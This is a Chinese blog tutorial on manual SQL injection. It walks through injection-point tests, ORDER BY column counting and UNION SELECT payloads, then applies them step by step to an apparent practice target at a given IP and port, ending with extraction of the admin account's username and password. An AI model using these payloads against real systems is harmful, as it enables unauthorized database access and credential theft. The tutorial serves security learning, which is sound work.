内容简介:id=1',在1后面加',页面出错id=1 and 1=1正常,id=1 and 1=2,页面出错id=1 and 1='1'正常,id=1 and 1='1'页面出错
判断注入点
id=1',在1后面加',页面出错
id=1 and 1=1正常,id=1 and 1=2,页面出错
id=1 and 1='1'正常,id=1 and 1='1'页面出错
注:通过构造错误的语句,根据返回结果来判断是否存在注入点
手动注入
- 判断字段数
id =1 order by x,x=1,2,3,4,·······,按第1,2,3,4,······列进行排序 - 判断回显点
union select 1,2,3,4,5,6,7,8,9,10,11 from admin,1,2,3,4...,这里的几个数字纯粹是凑数的, 凑够和union关键字前面的那个表的字段数一样 ,不然没法拼接成一个表。在 sql 注入的时候,在将相应位置替换成你想获得的数据,查询结果后面就会显示出来;效果是from当前字段对应的服务器端的一张表。权限肯定有限制,所以 要看返回的数字才能确定哪一列可以回显到客户端 ,而不是随便哪一列都能利用的。比如服务器返回3,说明第3列可以回显
查询相关内容
- 猜表名
union select 1,2,3,4,5,6,7,8,9,10 from 表名
如果不报错,则该表存在 - 猜字段名->查询字段内容
union select 1,2,3,4,password,6,7,8,9,10 from 表名
如果不报错,则该字段存在
实战
目标链接: http://120.203.13.75 :6815/index.php
-
找注入点:
http://120.203.13.75:6815/index.php?id=1 and 1=2
-
判断字段数
http://120.203.13.75:6815/index.php?id=1 order by 2
1、2均正常显示,3的时候出现异常,则当前表的字段数为2
-
判断回显点
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,2
-
查相关内容(一定要在回显点处查看!)
查数据库名
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,database()
查数据库版本
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,version()
查表名
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
查字段名
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1
http://120.203.13.75:6815/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1
查出 admin 表里 有 id username password 三个字段
查询字段内容
构造
?id=1 and 1=2 union select 1,username from admin limit 0,1
构造
?id=1 and 1=2 union select 1,password from admin limit 1,1
limit 1,1 没有回显,说明只有一个用户
构造
?id=1 and 1=2 union select 1,password from admin limit 0,1
如此,得到了管理员账号和密码
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
- Angular 4 依赖注入教程之二 组件中注入服务
- 服务端注入之Flask框架中服务端模板注入问题
- 服务器端电子表格注入 - 从公式注入到远程代码执行
- SQL注入测试技巧TIP:再从Mysql注入绕过过滤说起
- 手机抓包+注入黑科技HttpCanary——最强大的Android抓包注入工具
- 三, 跨语言微服务框架 - Istio官方示例(自动注入.请求路由.流量控制.故障注入) 原 荐
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Microsoft Windows程序设计
佩措尔德 / 章立民 / 华中科技 / 2004-1 / 118.00元
Charles Petzold是全球最权威且知名的Windows程序设计专家,他将其最畅销Programming Microsoft Windows with C#一书加以改写,使之能完全适用于Visual Basic.NET的开发人员。这位畅销书的作家示范了如何使用Visual Basic.NET将Windows Forms的功能发挥到极致(Windows Forms是新一代的Windows程序......一起来看看 《Microsoft Windows程序设计》 这本书的介绍吧!
